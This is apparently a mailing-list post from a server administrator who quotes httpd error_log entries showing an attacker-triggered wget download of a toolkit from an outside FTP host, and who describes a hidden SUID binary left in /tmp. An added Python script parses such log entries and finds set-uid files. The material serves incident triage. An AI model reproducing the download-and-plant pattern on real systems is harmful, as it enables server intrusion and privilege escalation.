Thanks Ryan,
I looked in the httpd error_log and found numerous entries like this:
--21:54:38--
ftp://darktr0jan:*password*@gate.pol.../neon20.tar.gz
=> `neon20.tar.gz.59'
Resolving gate.polarhome.com... done.
Connecting to gate.polarhome.com[81.216.198.11]:21... connected.
Logging in as darktr0jan ... Logged in!
==> SYST ... done. ==> PWD ... done.
==> TYPE I ... done. ==> CWD /bandy ... done.
==> PORT ... done. ==> RETR neon20.tar.gz ... done.
Length: 26,405 (unauthoritative)
0K .......... .......... ..... 100% 7.13 KB/s
21:54:56 (7.13 KB/s) - `neon20.tar.gz.59' saved [26405]
...and found the corresponding file in /tmp. Also in /tmp there was a hidden folder called .f containing a 'kmod' executable with SUID permissions. So I guess that was it ...
But I would really like to prevent httpd from allowing people to do this kind of stuff!
thanks
Abe
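
The triage described in the post above can be scripted; the following is an added example, not part of the original message. It pulls wget transcripts in the format quoted above out of error_log lines and lists set-uid files under a directory such as /tmp. The function names are hypothetical and the sample is the post's own log excerpt, abridged.

```python
import os
import re
import stat

# Sample input: the wget transcript quoted in the post, abridged.
SAMPLE_LOG = """\
--21:54:38--
ftp://darktr0jan:*password*@gate.pol.../neon20.tar.gz
=> `neon20.tar.gz.59'
Connecting to gate.polarhome.com[81.216.198.11]:21... connected.
21:54:56 (7.13 KB/s) - `neon20.tar.gz.59' saved [26405]
"""

START = re.compile(r"^--(\d{2}:\d{2}:\d{2})--\s*$")
URL = re.compile(r"^(?:ftp|https?)://\S+")
CONNECT = re.compile(r"^Connecting to ([^\[\s]+)\[([\d.]+)\]:(\d+)")
SAVED = re.compile(r"`([^']+)' saved \[(\d+)\]")

def find_wget_downloads(lines):
    """Return one dict per wget transcript found in web-server log lines."""
    events, cur = [], None
    for raw in lines:
        line = raw.strip()
        m = START.match(line)
        if m:
            cur = {"started": m.group(1)}
            events.append(cur)
            continue
        if cur is None:
            continue
        if "url" not in cur and URL.match(line):
            # Strip user:password@ so the report does not copy credentials.
            cur["url"] = re.sub(r"//[^/@\s]+@", "//", line)
        elif (m := CONNECT.match(line)):
            cur["host"], cur["ip"], cur["port"] = m.group(1), m.group(2), int(m.group(3))
        elif (m := SAVED.search(line)):
            cur["saved_as"], cur["bytes"] = m.group(1), int(m.group(2))
            cur = None  # transcript complete; wait for the next start marker
    return events

def find_suid_files(root):
    """List set-uid regular files under root, hidden directories included."""
    hits = []
    for dirpath, _dirs, files in os.walk(root):
        for path in (os.path.join(dirpath, f) for f in files):
            mode = os.lstat(path).st_mode
            if stat.S_ISREG(mode) and mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)
```

Feed `find_wget_downloads` the lines of the server's error_log and compare each `saved_as` name against what `find_suid_files("/tmp")` and a plain directory listing turn up.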